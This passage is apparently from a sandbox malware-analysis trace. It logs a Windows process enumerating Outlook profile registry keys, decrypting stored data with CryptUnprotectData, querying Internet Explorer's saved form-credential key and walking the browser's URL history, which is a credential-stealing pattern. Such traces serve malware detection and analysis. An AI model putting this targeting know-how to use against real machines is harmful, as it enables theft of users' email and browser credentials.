KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.949] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.962] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0xdd708 | out: String="2") returned 0x0 [0285.962] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.962] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.962] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x8000001a [0285.962] NtClose (Handle=0x220) returned 0x0 [0285.963] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x0 [0285.963] NtCreateKey (in: KeyHandle=0xde3f0, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f0*=0x220) returned 0x0 [0285.963] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0285.963] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.050] RtlIntegerToChar (in: Value=0xd84397d8, Base=0x0, Length=0x20, String=0xdd708 | out: String="3628308440") returned 0x0 [0286.050] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.050] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.050] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.050] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.050] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.051] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.051] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x8, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0286.051] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="crypt32.dll", BaseAddress=0xdd65c | out: BaseAddress=0xdd65c*=0x75480000) returned 0x0 [0286.999] CryptUnprotectData (in: pDataIn=0xdd6e0, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0xdd6d8 | out: ppszDataDescr=0x0, pDataOut=0xdd6d8) returned 1 [0287.139] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x527420) returned 1 [0287.139] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x9, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.217] RtlIntegerToChar (in: Value=0x0, Base=0x0, Length=0x20, String=0xdd708 | out: String="0") returned 0x0 [0287.217] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0xa, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.230] RtlIntegerToChar (in: Value=0xe0003, Base=0x0, Length=0x20, String=0xdd708 | out: String="917507") returned 0x0 [0287.230] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0xb, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.230] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0xc, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.230] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0xd, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.231] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0xe, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x8000001a [0287.231] NtClose (Handle=0x220) returned 0x0 [0287.231] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x0 [0287.231] NtCreateKey (in: KeyHandle=0xde3f0, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f0*=0x220) returned 0x0 [0287.231] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.231] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.244] RtlIntegerToChar (in: Value=0x3c53db58, Base=0x0, Length=0x20, String=0xdd708 | out: String="1012128600") returned 0x0 [0287.244] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.244] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.244] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.348] RtlIntegerToChar (in: Value=0x4, Base=0x0, Length=0x20, String=0xdd708 | out: String="4") returned 0x0 [0287.348] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.348] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x0 [0287.348] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd7a0, Length=0x400, ResultLength=0xde3fc | out: KeyValueInformation=0xdd7a0, ResultLength=0xde3fc) returned 0x8000001a [0287.348] NtClose (Handle=0x220) returned 0x0 [0287.348] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0287.348] NtClose (Handle=0x21c) returned 0x0 [0287.348] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0xa, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0287.348] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0287.349] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0287.349] NtClose (Handle=0x21c) returned 0x0 [0287.349] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0xb, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0287.349] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0287.349] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0287.349] NtClose (Handle=0x21c) returned 0x0 [0287.349] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0xc, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0287.349] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0287.349] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0287.350] NtClose (Handle=0x21c) returned 0x0 [0287.350] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0xd, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x0 [0287.350] NtCreateKey (in: KeyHandle=0xde3f4, DesiredAccess=0x20219, ObjectAttributes=0xdd758*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3f4*=0x21c) returned 0x0 [0287.350] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddba0, Length=0x400, ResultLength=0xde3fc | out: KeyInformation=0xddba0, ResultLength=0xde3fc) returned 0x8000001a [0287.350] NtClose (Handle=0x21c) returned 0x0 [0287.350] NtEnumerateKey (in: KeyHandle=0x1e8, Index=0xe, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x8000001a [0287.350] NtCreateKey (in: KeyHandle=0xdea50, DesiredAccess=0x20219, ObjectAttributes=0xde3e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea50*=0x21c) returned 0x0 [0287.351] NtEnumerateKey (in: KeyHandle=0x21c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddfa0, Length=0x200, ResultLength=0xde3e8 | out: KeyInformation=0xddfa0, ResultLength=0xde3e8) returned 0x8000001a [0287.352] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddb38 | out: TokenHandle=0xddb38*=0x220) returned 0x0 [0287.352] NtQueryInformationToken (in: TokenHandle=0x220, TokenInformationClass=0x1, TokenInformation=0xdd330, TokenInformationLength=0x400, ReturnLength=0xddb30 | out: TokenInformation=0xdd330, ReturnLength=0xddb30) returned 0x0 [0287.352] ConvertSidToStringSidW (in: Sid=0xdd338*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddb34 | out: StringSid=0xddb34*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0287.352] NtClose (Handle=0x220) returned 0x0 [0287.352] NtCreateKey (in: KeyHandle=0xdea4c, DesiredAccess=0x20219, ObjectAttributes=0xddb34*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea4c*=0x220) returned 0x0 [0287.352] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogri.ini", NtPathName=0xdda30, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.353] NtCreateFile (in: FileHandle=0xdda50, DesiredAccess=0x120089, ObjectAttributes=0xdda18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdda38, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdda50*=0x0, IoStatusBlock=0xdda38*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.353] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505b20) returned 1 [0287.418] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0xdda5c | out: BaseAddress=0xdda5c*=0x75b00000) returned 0x0 [0287.506] LdrGetProcedureAddress (in: BaseAddress=0x75b00000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xdda40 | out: ProcedureAddress=0xdda40*=0x748d92a0) returned 0x0 [0287.508] LdrGetProcedureAddress (in: BaseAddress=0x75b00000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xdda2c | out: ProcedureAddress=0xdda2c*=0x74900060) returned 0x0 [0287.508] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1f4400) returned 0x8514020 [0287.603] CoInitialize (pvReserved=0x0) returned 0x0 [0288.319] CoCreateInstance (in: rclsid=0xddb44*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xddb54*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0xddb6c | out: ppv=0xddb6c*=0x50fb60) returned 0x0 [0293.809] IUrlHistoryStg:EnumUrls (in: This=0x50fb60, ppenum=0xddb68 | out: ppenum=0xddb68*=0x5304a0) returned 0x0 [0293.813] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0xdf2e0 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.503] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.712] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.712] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.713] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.713] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.713] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.713] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.713] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.713] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.714] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.714] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.714] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.714] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.715] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.716] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.716] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.716] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.716] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.716] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.716] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.716] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.717] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.717] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.717] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.722] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.722] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.722] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.722] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.722] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.723] IEnumSTATURL:Next (in: 